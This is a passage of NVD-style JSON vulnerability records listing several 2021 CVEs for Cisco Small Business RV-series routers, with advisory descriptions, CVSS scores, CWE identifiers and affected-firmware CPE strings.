["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1188", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1188", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:15", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1211", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1211"], "modified": "2021-01-15T19:44:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1211", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1211", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:43", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1183", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1183"], "modified": "2021-01-19T19:08:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.0.3.44", "cpe:/o:cisco:rv130w_firmware:1.0.3.44", "cpe:/o:cisco:rv110w_firmware:1.0.3.44", "cpe:/o:cisco:rv215w_firmware:1.0.3.44"], "id": "CVE-2021-1183", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1183", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.44:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:43", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1184", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1184"], "modified": "2021-01-15T19:55:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1184", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1184", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:20", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1215", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1215"], "modified": "2021-01-15T19:42:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1215", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1215", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:22", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1169", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1169"], "modified": "2021-01-19T19:22:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1169", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1169", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:05", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1202", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1202"], "modified": "2021-01-19T19:01:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv215w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8"], "id": "CVE-2021-1202", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1202", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv215w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:18", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1214", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1214"], "modified": "2021-01-15T19:43:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1214", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1214", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:18", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1213", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1213"], "modified": "2021-01-15T19:43:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1213", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:36", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1180", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1180"], "modified": "2021-01-19T19:11:00", "cpe": 